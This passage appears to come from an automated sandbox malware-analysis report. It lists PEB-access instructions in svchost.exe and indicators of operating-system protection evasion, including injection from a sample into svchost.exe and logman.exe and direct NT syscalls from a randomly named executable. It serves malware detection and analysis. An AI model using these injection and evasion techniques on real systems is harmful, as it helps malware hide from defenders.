                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]2_2_03A04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]2_2_039BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]2_2_03930887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]2_2_0395E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]2_2_03A008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]2_2_039FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]2_2_039BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00C680A9
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C3A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C3A155
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C3A124 SetUnhandledExceptionFilter,0_2_00C3A124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\logman.exe protection: execute and read and writeJump to behavior
